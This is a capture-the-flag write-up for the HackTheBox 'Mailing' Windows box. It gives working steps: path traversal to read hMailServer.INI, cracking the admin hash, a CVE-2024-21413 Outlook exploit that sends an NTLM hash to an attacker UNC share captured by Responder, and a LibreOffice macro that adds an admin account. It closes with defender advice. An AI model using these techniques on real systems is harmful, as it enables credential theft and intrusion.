Mailing — Tabarik Asif

Recon

Windows box with a full mail server stack. Multiple mail protocols exposed alongside SMB and WinRM — the Windows combination that should trigger immediate credential hunt instincts.

$ nmap -sC -sV -oN nmap/initial 10.129.5.20
25/tcp   open  smtp      hMailServer
80/tcp   open  http      Microsoft IIS 10.0
|_http-title: Mailing
110/tcp  open  pop3      hMailServer
143/tcp  open  imap      hMailServer
445/tcp  open  smb
587/tcp  open  smtp      hMailServer (submission)
993/tcp  open  ssl/imap
5985/tcp open  http      Microsoft HTTPAPI 2.0 (WinRM)

hMailServer is running on multiple ports. The web app at port 80 is a landing page for the mail service. I looked for information leakage there first.

Enumeration

LFI via Download Parameter

The web app has a /download.php?file= parameter for downloading resources. I tested for path traversal:

$ curl "http://mailing.htb/download.php?file=../../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events

[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c (MD5)

[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

AdministratorPassword is an MD5 hash. Crack it:

$ echo "841bb5acfa6779ae432fd7a4e6600ba7" | hashcat -m 0 - /usr/share/wordlists/rockyou.txt
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator

Logged into the hMailServer admin panel at http://mailing.htb/administrator/ with administrator:homenetworkingadministrator. I could now send mail as any account. I created attacker@mailing.htb and targeted maya@mailing.htb.

Foothold

CVE-2024-21413 — Microsoft Outlook MonikerLink vulnerability. A specially crafted mailto: link containing a UNC path (e.g., \\attacker\share\file.txt) in the link text bypasses Outlook's Protected View. When the victim previews or opens the email, Outlook connects to the UNC share, triggering NTLM authentication to the attacker's machine.

CVE-2024-21413 — MonikerLink

Outlook fails to properly sanitize UNC paths in file:// or custom moniker links. The exploit triggers outbound NTLM authentication from the victim's machine to the attacker — without any user interaction beyond previewing the email.

# start Responder to capture NTLM hash
$ sudo responder -I tun0

# send the exploit email
$ python3 CVE-2024-21413.py \
  --server mailing.htb \
  --port 587 \
  --username administrator@mailing.htb \
  --password homenetworkingadministrator \
  --sender attacker@mailing.htb \
  --recipient maya@mailing.htb \
  --url '\\10.10.14.X\share\meeting' \
  --subject "Team Meeting Notes"
[+] Email sent successfully

# Responder captures maya's NTLMv2 hash within seconds
[SMB] NTLMv2-SSP Hash : maya::MAILING:1122334455667788:A4B3C2D1...
[+] NTLMv2 Hash captured from 10.129.5.20

$ hashcat -m 5600 maya_hash.txt /usr/share/wordlists/rockyou.txt
maya::MAILING:...:m3li@dc.
$ evil-winrm -i 10.129.5.20 -u maya -p 'm3li@dc.'
*Evil-WinRM* PS C:\Users\maya\Documents>

Privilege Escalation

Enumerated Maya's group memberships and accessible directories. Maya has write access to C:\Important Documents\. A scheduled task runs as administrator and opens documents in that directory with LibreOffice.

LibreOffice supports macros in .odt files. I created a malicious .odt with a Basic macro that adds a local admin user, placed it in the watched directory, and waited for the scheduled task to execute it.

# macro in the .odt file (LibreOffice Basic)
Sub AutoOpen()
    Dim sCmd As String
    sCmd = "cmd.exe /c net user hacker Pass123! /add && net localgroup Administrators hacker /add"
    Shell "cmd.exe /c " & sCmd
End Sub

# place the .odt in the watched directory
*Evil-WinRM* PS C:\Users\maya\Documents> cp evil.odt "C:\Important Documents\"
# wait for the scheduled task to run...
$ evil-winrm -i 10.129.5.20 -u hacker -p 'Pass123!'
*Evil-WinRM* PS C:\Users\hacker\Documents> whoami /groups
MAILING\Administrators

Flags

User Flag

C:\Users\maya\Desktop\user.txt

Root Flag

C:\Users\Administrator\Desktop\root.txt

Lessons Learned

Path traversal in download.php-style endpoints leaks config files — always test file download parameters for directory traversal, especially on Windows where hMailServer.INI is a known sensitive target.
CVE-2024-21413 demonstrates that email clients are reliable NTLM credential theft vectors — a previewed email can capture domain hashes without any clicks from the victim.
Scheduled tasks that process user-controlled files are a privilege escalation path — LibreOffice, Word, Excel and other document processors that support macros are dangerous in this context.
MD5-hashed passwords are still common in legacy application config files and remain trivially crackable — never store passwords as MD5 hashes.

Defender Note

Patch Outlook to mitigate CVE-2024-21413. Block outbound SMB (port 445) at the perimeter to prevent NTLM relay attacks. Sanitize file download endpoints with a strict allowlist of permitted files. Disable LibreOffice macros in organizational deployments via group policy.